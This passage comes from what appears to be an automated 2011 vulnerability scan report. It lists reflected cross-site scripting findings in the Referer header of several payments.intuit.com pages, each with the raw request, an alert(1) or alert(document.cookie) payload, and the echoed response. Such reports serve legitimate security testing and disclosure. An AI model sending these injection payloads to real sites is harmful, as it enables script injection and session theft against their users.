Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/credit-card-processing-services.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=7408f'-alert(1)-'85140b02fc7

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:38 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=KXchY7zOwHEUHqUESwiMjg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:39 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9610A390A0805192AA117E38D800405
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dcredit_002dcard_002dprocessing_002dservices_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 140381

...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=7408f'-alert(1)-'85140b02fc7';
                   </script>
...[SNIP]...

1.48. http://payments.intuit.com/products/quickbooks-payment-solutions/credit-card-processing-services.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/credit-card-processing-services.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload ee311--><script>alert(1)</script>ebc26ad0fcf was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/credit-card-processing-services.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=ee311--><script>alert(1)</script>ebc26ad0fcf

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:49 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=JuEIdSq8Lvf1p84mE3Y8ZQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:50 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D961352D0A0805192AA117E3214A5750
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dcredit_002dcard_002dprocessing_002dservices_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 140415

...[SNIP]...
<!--http://www.google.com/search?hl=en&q=ee311--><script>alert(1)</script>ebc26ad0fcf | -->
...[SNIP]...

1.49. http://payments.intuit.com/products/quickbooks-payment-solutions/custom-gift-card-program.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/custom-gift-card-program.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload d4413--><script>alert(1)</script>903e8593f48 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/custom-gift-card-program.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=d4413--><script>alert(1)</script>903e8593f48

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:34 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=Gip6gRfT-so3qVBtC6GzuQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:35 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D960F89B0A0805192AA117E3E7C08A67
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=custom_002dgift_002dcard_002dprogram_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 133395

...[SNIP]...
<!--http://www.google.com/search?hl=en&q=d4413--><script>alert(1)</script>903e8593f48 | -->
...[SNIP]...

1.50. http://payments.intuit.com/products/quickbooks-payment-solutions/custom-gift-card-program.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/custom-gift-card-program.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c386'-alert(1)-'4f235ab0373 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/custom-gift-card-program.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=4c386'-alert(1)-'4f235ab0373

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:21 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=FrlChAgtaNosF3G6WcIxAg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:22 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D960C5470A0805192AA117E35410D15A
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=custom_002dgift_002dcard_002dprogram_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 133364

...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=4c386'-alert(1)-'4f235ab0373';
                   </script>
...[SNIP]...

1.51. http://payments.intuit.com/products/quickbooks-payment-solutions/online-credit-card-processing.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/online-credit-card-processing.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd842'-alert(1)-'54daf563e41 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/online-credit-card-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=dd842'-alert(1)-'54daf563e41

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:48 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=kqRkVYeMrNDFvcp7PtLGZQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:49 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D961303D0A0805192AA117E3B8A62CFA
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=online_002dcredit_002dcard_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116174

...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=dd842'-alert(1)-'54daf563e41';
                   </script>
...[SNIP]...

1.52. http://payments.intuit.com/products/quickbooks-payment-solutions/online-credit-card-processing.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/online-credit-card-processing.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 6a030--><script>alert(1)</script>f0702fdbff1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/online-credit-card-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=6a030--><script>alert(1)</script>f0702fdbff1

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:56 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=BxeGx4m3z2EJ+m3XOlmO7A**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:57 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9614DF20A0805192AA117E30B39989D
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=online_002dcredit_002dcard_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116205

...[SNIP]...
<!--http://www.google.com/search?hl=en&q=6a030--><script>alert(1)</script>f0702fdbff1 | -->
...[SNIP]...

1.53. http://payments.intuit.com/products/quickbooks-payment-solutions/point-of-sale-solutions.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/point-of-sale-solutions.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload addb8'-alert(1)-'021e03ba62f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/point-of-sale-solutions.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=addb8'-alert(1)-'021e03ba62f

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:14 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=Ub5cWhPyc75agcHyjLX5HA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:15 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D960AADB0A0805192AA117E39FDA00CC
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=point_002dof_002dsale_002dsolutions_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 150347

...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=addb8'-alert(1)-'021e03ba62f';
                   </script>
...[SNIP]...

1.54. http://payments.intuit.com/products/quickbooks-payment-solutions/point-of-sale-solutions.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/point-of-sale-solutions.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload a2606--><script>alert(1)</script>36ea6b49a2c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
